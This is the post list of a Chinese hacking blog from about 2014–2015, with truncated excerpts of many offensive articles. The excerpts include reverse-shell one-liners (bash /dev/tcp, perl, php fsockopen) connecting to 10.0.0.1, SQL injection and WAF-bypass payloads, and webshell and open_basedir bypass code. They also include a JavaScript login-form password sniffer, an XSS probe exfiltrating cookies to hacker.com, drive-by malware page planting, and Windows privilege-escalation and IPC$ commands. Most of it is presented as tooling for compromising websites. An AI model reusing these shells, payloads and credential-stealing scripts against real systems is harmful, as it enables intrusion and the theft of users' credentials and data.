- 博客(43)
- 收藏
- 关注
转载 利用systeminfo命令查找可用的windows提权EXP
利用systeminfo命令查找可用的windows提权EXP,输出的即为未打补丁的漏洞。文章根据网络上的相关内容做了一点修改(更新)systeminfo>tmp.txt&(for /f %i in (MS.txt) do @type tmp.txt|@find /i "%i"||@echo %i)&del /f /q tmp.txtMS.txt中的内容为:
2015-03-30 17:38:52
4791
原创 使用sqlmap 代替access 注入中转
背景:测试站点是ASP的程序,经测试 shownews.asp?id=61存在注入GET方法 shownews.asp?id=61 and 4>1 返回警告改成POST方法,仍然出现警告最后,测试cookie注入,如下图,在控制台提交document.cookie="id="+escape("61 and 4>1"),新增cookie项id,然后再次访问shownews.asp
2015-03-14 23:40:35
1645
原创 access 偏移注入 案例
news.asp?id=3039 and 4>8 union select 1,2,3,4,* from manage_admin as a inner join manage_admin as b on a.id=b.id看个案例就明白是什么意思了先是背景news.asp?id=3306 存在注入然后通过 order by 可知查询返回 12 列通过数据表字典跑出管理员表 m
2015-03-14 20:44:42
1287
原创 一条命令引发的思考
这条命令是php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i &3 2>&3");'作用是反弹一个交互式的shell代码看得不太懂,所以很有必要了解一下。-i interactive Force the shell to behave interactively.文件描述符0 stdin
2015-02-10 22:14:24
486
转载 php-reverse-shell
功能:返回一个交互式的shell使用:先修改脚本中的两个变量 $ip 和 $port 为自己所需的。然后本地监听 $port 。例如:$ip = '192.168.1.111'; // CHANGE THIS$port = 13123; // CHANGE THISnc -v -l -p 13123然后上传并在浏览器中打开该PHP脚本文件。效果图:源代码
2015-02-10 18:40:39
1883
转载 Reverse Shell Cheat Sheet
1.bashbash -i >& /dev/tcp/10.0.0.1/8080 0>&12.perlperl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){ope
2015-02-09 22:03:35
820
转载 反弹 shell 脚本
从大马里面提取出来的,分别用perl 和 C实现 。保存为reverse_exp,然后执行perl ./reverse_exp 192.168.1.111 13123。在192.168.1.111 上执行 nc -v -l -p 13123#!/usr/bin/perluse Socket;$cmd= "lynx";$system= 'echo "`uname -a`
2015-02-09 21:42:08
663
转载 PHP 5.x Shellshock Exploit (bypass disable_functions)
# Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions)# Google Dork: none# Date: 10/31/2014# Exploit Author: Ryan King (Starfall)# Vendor Homepage: http://php.net# Software Link:
2015-02-07 22:46:03
889
原创 PHP disable_function与safe mode
我只想执行操作系统命令,可是有disable_functions 和 安全模式的阻碍。disable_functions本指令允许你基于安全原因禁止某些函数,从 PHP 4.0.1 起可用。其默认值为空,接受逗号分隔的函数名列表作为参数。 disable_functions 不受安全模式的影响。 本指令只能设置在 php.ini 中。可以通过以下这行代码获取disable_func
2015-02-07 21:00:35
1511
原创 bypass open_basedir
在了解symlink() bypass open_basedir 的原理后,自己写的代码。在kali-Linux 上测试通过,Windows在路径的处理上需要修改一下。<?php/*titile: bypass open_basedirauth: eT48*/header("Conten-type:text/html; charset:udf-8");error_repor
2015-02-06 16:54:01
951
原创 PHP扫描内网存活主机
直接上代码<?PHPheader('Content-Type: text/html; charset=utf-8'); error_reporting(0); function ping($host, $timeout = 1) { $package = "\x08\x00\x7d\x4b\x00\x00\x00\x00PingHost"; $socket = socket_
2015-02-01 22:27:28
1980
转载 菜刀杀狗
中转是一种思路,把狗拦截的关键字以一种等效的方式替换为其他的。<?php $webshell="http://www.example.com/1.php";//把这里改成你的shell地址 $webshell=$webshell."?&1141056911=base64_decode"; $da=$_POST; $data = $da; @$data=str_replace("ba
2015-01-29 21:15:51
688
原创 通过“Robots <META> tag”防止搜索引擎收录网页后门
这是我这b374k.php上看到的。我们通过“Robots tag”来告诉搜索引擎spider不要索引页面的内容以及不扫描页面中的链接。这样他人就不能通过搜索关键字的方式找到我们的网页后门了。还可以再加一个“noarchive”属性防止搜索引擎保存网页的快照。参考:http://www.robotstxt.org/meta.html http:
2015-01-27 20:38:01
584
转载 bypass waf 进行post注入
原标题:轻松绕各种WAF的POST注入、跨站防御(比如安全狗) 轻松绕各种WAF的POST注入、跨站防御(比如安全狗) File: ID: 转载自:http:/
2015-01-13 21:13:40
693
原创 php-文件上传
简单的编程,只为学习PHP。<?phpheader("Content-Type:text/html; charset=utf-8");error_reporting(0);print<<<END文件上传实例END;$uppath=$_SERVER["SCRIPT_FILENAME"];$uppath=dirname($uppath);$uppath =
2015-01-13 16:01:11
466
原创 php-批量端口扫描
phpwebshell端口扫描<?php/*auth: eT48blog: http://blog.youkuaiyun.com/et48_sec*/header('Content-Type: text/html; charset=utf-8');error_reporting(0);print<<<END ip: port: END;$timeout=3;fun
2015-01-13 14:40:36
1155
原创 PHP实现目录遍历
目录遍历是文件管理的基础,在此基础上增加删除,新建,编辑,下载,浏览就更好了。<?phpheader('Content-Type:text/html; charset=gb2312');error_reporting(0);$dir=$_GET['dir'];if(is_dir($dir)){echo "Index of ".realpath($dir)."";ech
2015-01-12 16:34:51
607
原创 MSSQL-xp_cmdshell 的利用
一.关于xp_cmdshellxp_cmdshell是用于执行Windows命令的一个扩展存储过程。xp_cmdshell 生成的 Windows 进程与 SQL Server 服务帐户具有相同的安全权限。 自SQL Server 2000后,默认情况下,xp_cmdshell 选项在新安装的软件上处于禁用状态,但是可以运行 sp_configure 系统存储过程来启用它。二.xp
2015-01-08 12:48:48
1416
转载 symlink() open_basedir bypass 原理分析
之前在网上看到相关php open_basedir bypass的文章都不是很理解,看了原作者的文章后总算明白了。原文:http://cxsecurity.com/issue/WLB-2009110068ok,先来了解一下什么是open_basedir。open_basedir 将 PHP 所能打开的文件限制在指定的目录树,包括文件本身。本指令不受安全模式打开或者关闭的影响。
2015-01-05 22:47:05
1606
原创 使用include实现php一句话
我是菜牛各位看官轻喷。PHP一句话主要实现的是,动态执行PHP代码。PHP小马主要实现的是,文件上传。PHP大马主要实现的是,提权。include 语句包含并运行指定文件。 <?php//服务端if(!empty($_POST['code'])){$code=trim($_POST['code']);$handle=fopen('cmd.txt','w
2015-01-05 15:57:03
869
转载 php LFI读php文件源码以及直接webshell
小菜无意中看到大牛的一篇文章,看后觉得很受益,所以就转载过来了。之前只知道“include”语句是包含并运行指定文件,遇到的话也只是找上传点然后getshell。看来这篇文章后,才知道还可以读取php文件的源代码,这样的话,就可以读取网站的配置文件了。而且在allow_url_include=On 的情况下,还可以直接执行php代码。原文:http://hi.baidu.com/c
2015-01-05 14:13:45
1224
原创 PHP小马
http://xiaojianke.blog.163.com是我原来的博客,工作后换成了C博客,这里吐槽一下网易博客太差了。看到网上那么多PHP小马,我也来自己写一个,练习PHP编程。<?phperror_reporting(E_ERROR);header('Content-Type:text/html; charset=utf-8');$path=getcwd();$pe
2015-01-04 21:18:09
1948
1
原创 Encoding Web Shells in PNG IDAT chunks
原文在这里:https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/很老的一篇文章,大概说的是在png图片里面隐藏php一句话代码。现在看来,实现也不难,使用copy命令即可。之所以还写出来是为了练习PHP编程。还可以参考:https://bugscollector.com/tricks
2015-01-04 20:59:53
1430
转载 Reading files in MySQL with file_priv = no
好吧,我是在法客上看到园长发的这篇文章,然后追到乌云,然后追到源头,觉得很是实用,所以就贴出来了。All we know for reading files in MySQL we need file_priv permission.But there is way for reading files without this permission.We can creat
2015-01-04 17:16:55
587
转载 MYSQL-执行“load data local infile”报错“The used command is not allowed with this MySQL version”
MYSQL在执行“load data local infile”的时候报错“The used command is not allowed with this MySQL version”,本人所用的版本是 “5.5.38-0+wheezy1”,然后在网上找到了下面这篇文章,得到的解决方案。在部署在不同机器上的mysql数据库之间导数据时,load data infile是一个很高
2015-01-04 16:52:34
6359
1
原创 通过UA判断客户端的操作系统类型
我们可以通过一个javascript脚本获取客户端返回的User-Agent,然后根据其中的信息判断客户端使用什么操作系统。Windows系列Windows NT俗称NT 5.0Windows 2000NT 5.1Windows XPNT 5.2Windows XPWindows 2003NT6.0
2015-01-03 20:26:00
2684
转载 使用meta标签指定双核浏览器以IE浏览器内核渲染网页
“双核”浏览器,顾名思义,就是浏览器内部包含两个渲染内核。目前大多数“双核”浏览器内部的两个内核分别是IE内核和WebKit内核。与双核处理器不同的是,“双核”浏览器的两个内核并不能同时为一个网页进行渲染排版工作,而是根据我们的需要,选择两者之中更适合当前网页的内核来进行渲染排版。IE内核主要用于兼容“老一辈”的网页,使其能够正常显示;WebKit内核则用于渲染“新一代”的网页,从而发挥出更快的显
2015-01-03 20:05:28
3220
原创 Javascript-截获登录表单的用户名和密码-v1.5
version 1.0 需要代码添加到登陆表单的后面,才可以正常使用。经完善后,可以添加在任何位置,比如 标签里,而不必添加在登录表单的后面。sniffer.js/*author: eT48blog: http://blog.youkuaiyun.com/et48_secversion: v1.5*/document.onreadystatechange = function()
2014-12-28 21:08:10
914
原创 Javascript-截获登录表单的用户名和密码-v1.0
一段截获登录表单的用户名和密码的Javascript脚本。拿下了网站的数据库却破不了MD5的情况下,可以尝试利用这段脚本截获登录表单的用户名和密码。这段脚本需要调用到DOM,所以应把这段代码插在登录表单之后。sniffer.js/*author: eT48blog: http://blog.youkuaiyun.com/et48_secversion: 1.0*/va
2014-12-28 18:45:28
1142
原创 几条命令-可能有些古董
几条命令,可能有些古董。ipconfigping 192.168.1.104nc -v -z -w 5 192.168.1.104 139 445net use \\192.168.1.104\ipc$ "test" /user:"test"copy hack.bat \\192.168.1.104\admin$net time \\192.168.1.104at
2014-12-27 22:28:53
537
原创 初学网页挂马
我觉得网页挂马要考虑两个因素:隐蔽性、成功率。我们只需保证浏览器加载并执行我们构造的特殊网页即可,这样的方法有许多。方法一,我们可以在首页加入以下这行代码。方法二,我们可以在首页加入以下这行代码。horse.js可以这样写:new Image.src="http://www.hacker.com/horse.html";或者d
2014-12-27 18:25:33
610
原创 MS14-065 漏洞播报
原文:https://technet.microsoft.com/zh-CN/library/security/ms14-065.aspx当用户使用 Internet Explorer 查看经特殊设计的网页时允许远程执行代码。 成功利用这些漏洞的攻击者可以获得与当前用户相同的用户权限。Windows 7(32 位/64位)Service Pack 1 上的 IE8、
2014-12-27 17:40:27
701
原创 XSS信息刺探脚本
重复造轮子,是的,我在学习编程。该 javascript 脚本主要收集客户端用户的 User_Agent、Cookie、Domain、Flash_Version。接收信息的文件由PHP编写,同时增加客户端的IP和访问时间。xss_probe.js/*xss_probeby eT48*/var http_server = "http://www.hacker.c
2014-12-27 16:14:34
660
原创 kali-linux 安装Flash
在虚拟机安装好kali 后就想找部电影看的,可以提示“由于您未安装flash播放器视频无法播放,点击这里安装”。好吧,点进去(跳转到Flash官网http://get.adobe.com/flashplayer/),选择.tar.gz for other linux,然后点击右下角的按钮进行下载。来到下载文件的目录,解压。tar -zxvf install_flash_pl
2014-12-26 22:48:41
1467
转载 Fix "/dev/sda1 unexpected inconsistency, run fsck manually"
我的 kali-linux 是安装在 vmware 上的,今天启动的时候进不了图形桌面,提示“/dev/sda1 unexpected inconsistency, run fsck manually”,然后输入startx 命令却提示“startx command not found”,好吧菜鸟就去百度了。然后找到这篇文章:http://blog.youkuaiyun.com/forever_k
2014-12-26 22:12:55
1628
转载 Could not apply the stored configuration for monitors
玩 kali-linux 的过程中遇到不少问题,还好网上都能找到解决的方案。原文:http://www.xiebiao.com/blog/?p=806今天在折腾kali 的时候出现了类似以下的画面。我是以root 登录的,按照原作者的说法删除掉 /root/.config/monitors.xml ,然后重启就正常了。
2014-12-26 21:37:28
440
转载 Kali-linux安装之后的简单设置
完整版请参考原文:http://xiao106347.blog.163.com/blog/static/215992078201342410347137/1.更新软件源:修改sources.list文件:leafpad /etc/apt/sources.list然后选择添加以下适合自己较快的源(可自由选择,不一定要全部):#官方源deb http
2014-12-25 16:05:42
518
转载 Fix metasploit " postgresql selected, no connection"
新手遇到的问题就是多,不要紧有google在。原文地址:https://forums.kali.org/showthread.php?22485-No-connection-to-Database-for-metasploit-after-update-solutionHi there,Connection to the postgresql database does
2014-12-25 15:27:11
2817
转载 Fix metasploit “Database not connected or cache not built”
刚开始玩kali-linux的时候也碰到过这个问题,然后google找到了解决的方案,转载回来。原文地址:http://www.dailysecurity.net/2013/05/11/fix-metasploit-database-not-connected-or-cache-not-built/This is a short post explaining how to dea
2014-12-25 15:07:43
858
原创 Metasploit-MSSQL渗透-实战篇
Kali Linux是基于Debian的Linux发行版, 设计用于数字取证和渗透测试。而Metasploit是Kali Linux中的一款开源安全漏洞检测工具。打开metasploit的控制台终端:先使用NMAP对目标进行端口扫描,目标的IP地址已经打码,不对外公开。从扫描结果中,我们得知目标对外开放了1433端口对应于ms
2014-12-24 15:24:26
13417
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人